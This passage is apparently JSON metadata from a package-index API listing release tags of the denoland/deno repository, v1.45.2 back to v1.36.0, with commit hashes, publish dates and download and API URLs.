9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","ki